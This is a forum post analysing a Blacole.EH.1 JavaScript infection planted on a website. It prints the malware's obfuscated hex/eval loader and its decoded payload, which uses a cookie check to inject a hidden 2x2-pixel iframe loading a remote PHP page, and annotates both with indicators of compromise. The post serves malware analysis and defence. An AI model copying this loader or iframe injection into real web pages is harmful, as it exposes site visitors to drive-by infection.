Blacole.EH.1 virus on website: Javascript/PHP infection

Linux howto's, compile information, information on whatever we learned on working with linux, MACOs and - of course - Products of the big evil....
^rooker
Site Admin
Posts: 1483
Joined: Fri Aug 29, 2003 8:39 pm

Blacole.EH.1 virus on website: Javascript/PHP infection

Post by ^rooker »

Recently, a friend of mine discovered a Javascript infection on one of his websites.
The virus' intrusion mechanism reminded me of the "Martuz" virus I've dealt with before.

It seems to use stolen FTP connection credentials to upload the infected files to the website.
Just like with Martuz' entry point, we currently also suspect the Windows client that was used to administer the website content to be the weak point.

This assumption is backed up by a knowledge-base entry on the Microsoft Security website about this virus (Blacole.EH.1 variant).

The virus' original javascript code-block is as follows:


            // Decoder stub: the hex-pair string in `f` is turned back into
            // JavaScript source one character at a time and handed to eval.
            // The aliases, dead assignments and nonsense arithmetic carry no
            // logic of their own; they are there to defeat signature matching.
            w=window;
            z="dy";
            d=document;
            aq="0x";
            bv=(5-3-1);
            // bv is 1 and is the subtrahend of the per-character decode below.
            // `++(d.body)` tries to write NaN back into document.body. In a
            // browser with a real DOM that assignment is expected to throw, and
            // only then does the catch block (the actual loader) run — presumably
            // an anti-sandbox check; confirm in a live DOM before relying on it.
            try{++(d.body)}catch(d21vd12v){vzs=false;
                // Empty try/catch; `vzs` is assigned twice and never read.
                try{}catch(wb){vzs=21;
                // `if(1)` always runs. `sp` is not defined anywhere in this
                // listing; for `f` to become an array of tokens it would have to
                // name "split" (f = string split on ":") — likely lost in the
                // paste. The string was wrapped onto several lines by the post's
                // author, so as printed it is not a single valid JS literal.
                }if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:6d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:
6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:
66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:
6d:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:
65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6d:25:6a:69:5a:17:34:17:
1e:5f:6b:6b:67:31:26:26:6a:64:6e:24:58:6c:5d:71:6c:5e:6a:70:6a:6b:5c:64:5c:
25:5b:5c:26:5a:5e:60:24:59:60:65:26:41:4e:64:5f:4f:6f:3f:2e:25:67:5f:67:1e:
32:4:1:17:6d:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:
6a:66:63:6c:6b:5c:1e:32:4:1:17:6d:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:
17:1e:29:1e:32:4:1:17:6d:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:
29:67:6f:1e:32:4:1:17:6d:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:29:
67:6f:1e:32:4:1:17:6d:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:
27:29:1e:32:4:1:17:6d:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:
29:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:
5c:64:5c:65:6b:39:70:40:5b:1f:1e:6d:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:
6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:6d:53:1e:17:5a:63:58:6a:6a:
34:53:1e:6d:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:
6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:6d:1e:20:25:58:67:67:5c:65:
5b:3a:5f:60:63:5b:1f:6d:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:
5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:
58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:
5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:
60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:
70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:
6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:
25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:
58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:
66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:
5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:
6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:
5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:
32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:
64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:
65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:
19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:
65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:
6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:
65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:
5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:
6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:
17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:
5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:
17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:
65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:
4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:
5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:
17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:
58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:
5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:
1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:
32:4:1:4:1:6d:27:30:1f:20:32:4:1:74:4:1:74"[sp](":");
                // From here on `w` is the token array, no longer `window`.
                }w=f;
                // `s` starts as an empty array; the first `+=` below coerces it
                // to a string, so it ends up holding the decoded source text.
                s=[];
                // 22-20-2 is 0 and the test is just i != 1367, so this visits
                // tokens 0..1366 — presumably the token count of `f`; a shorter
                // string would make eval("0x"+undefined) throw.
                for(i=22-20-2; -i+1367!=0; i+=1){
                    j=i;
                    // 0x19==031 is 25==25 (031 is octal), i.e. always true.
                    // Each token is parsed as hex via eval("0x"+tok), then
                    // +0xa-bv adds 9 to give the real character code
                    // (e.g. "17" -> 0x20, a space; "5d" -> 0x66, "f").
                    if((0x19==031))s+=String["fromCharCode"](eval(aq+w[1*j])+0xa-bv);
                }
                // Indirect eval of the decoded source. This is the line the
                // post replaces with console.log(s) to recover the plaintext.
                ht=eval;
                ht(s)
            }
NOTE: I had to break the hex-encoded string, because phpBB's "code"-block retains the original line-breaks, which makes it unreadable in a browser.

Obviously, the code is heavily obfuscated, and the long string in "f" is the actual, evil part of the code as hex-encoded javascript.
Thanks to user "JiminP" on reddit.com, who posted the unwrapping and interpretation of a similar piece of code.

Following JiminP's approach, I replaced "ht(s)" with "console.log(s);" to output the generated code:


/**
 * Decoded payload, stage 1: insert a near-invisible iframe pointing at the
 * attacker-controlled URL so that its content is fetched by every visitor
 * of the infected page. `static` and `controller` are assigned and never
 * used — padding, not logic.
 */
function v09() {
    var static = 'ajax';
    var controller = 'index.php';
    var v = document.createElement('iframe');

    // Remote landing URL, as printed in the post (the poster redacted the
    // host). This is the network indicator to look for in proxy/DNS logs.
    v.src = 'http://some_infected_url.de/cgi-bin/JWmhXxH7.php';
    // A 2x2 pixel box. `color`, `left` and `top` are given without CSS
    // units and so are not valid CSS values — presumably ignored by the
    // browser, which would make the 2px size the real concealment. Verify.
    v.style.position = 'absolute';
    v.style.color = '2';
    v.style.height = '2px';
    v.style.width = '2px';
    v.style.left = '10002';
    v.style.top = '10002';

    // Guard: at most one iframe per page load. document.write() inserts the
    // <p> container into the document currently loading — the infected
    // site's own page, not the remote PHP output — and the iframe is then
    // appended into that container.
    if (!document.getElementById('v')) {
        document.write('<p id=\'v\' class=\'v09\' ></p>');
        document.getElementById('v').appendChild(v);
    }
}

/**
 * Writes the cookie `cookieName=cookieValue` expiring `nDays` days from now.
 * nDays that is null/undefined (matched by `== null`) or 0 falls back to 1;
 * 3600000 ms * 24 is one day, and `*` coerces a string nDays such as '1'.
 * `path` is optional. The value goes through escape(), which GetCookie
 * below reverses with unescape(); both are legacy but paired consistently.
 */
function SetCookie(cookieName, cookieValue, nDays, path) {
    var today = new Date();
    var expire = new Date();
    if (nDays == null || nDays == 0) nDays = 1;
    expire.setTime(today.getTime() + 3600000 * 24 * nDays);
    document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}

/**
 * Returns the unescape()d value of cookie `name`, or null when absent.
 * Two things worth knowing, both visible below:
 *  - indexOf(name + "=") also matches a longer cookie name that merely ends
 *    in `name`, so it can return a different cookie's value.
 *  - `!start` is only true when start === 0, but then document.cookie
 *    begins with name + "=", so the prefix comparison in the first `if`
 *    is always false and that branch never returns. The start == -1 case
 *    is handled by the second `if`.
 */
function GetCookie(name) {
    var start = document.cookie.indexOf(name + "=");
    // Index just past "name=", i.e. where the value begins.
    var len = start + name.length + 1;
    if ((!start) &&
        (name != document.cookie.substring(0, name.length))) {
        return null;
    }
    if (start == -1) return null;
    // Value runs to the next ";" or to the end of the cookie string.
    var end = document.cookie.indexOf(";", len);
    if (end == -1) end = document.cookie.length;
    return unescape(document.cookie.substring(len, end));
}
// Entry point of the decoded payload: run the iframe dropper at most once
// per cookie lifetime per browser. GetCookie returns a string, so `== 55`
// relies on loose comparison with the number 55; the empty `if` body
// followed by `else` is just an inverted guard. SetCookie is called with
// nDays '1', so the cookie — and the suppression — lasts one day.
// The cookie name 'visited_uq' with value 55 in visitors' browsers is a
// usable indicator of this campaign.
if (navigator.cookieEnabled) {
    if (GetCookie('visited_uq') == 55) {} else {
        SetCookie('visited_uq', '55', '1', '/');

        v09();
    }
}
My Javascript-Foo is a bit rusty, but if I interpret the evil code correctly, it checks if the "visited_uq" cookie is set to the value "55". If it is, nothing happens. If it's not (=running for the first time, or cookies deleted), it loads the URL in "v.src" in an <iframe>, at a remote corner, 2x2 pixels wide (=not visible).

It then appends a paragraph html-element to the output of the called PHP file:


<p id='v' class='v09' ></p>
:? Huh? What for? Looks like cheap credits ;)
Jumping out of an airplane is not a basic instinct. Neither is breathing underwater. But put the two together and you're traveling through space!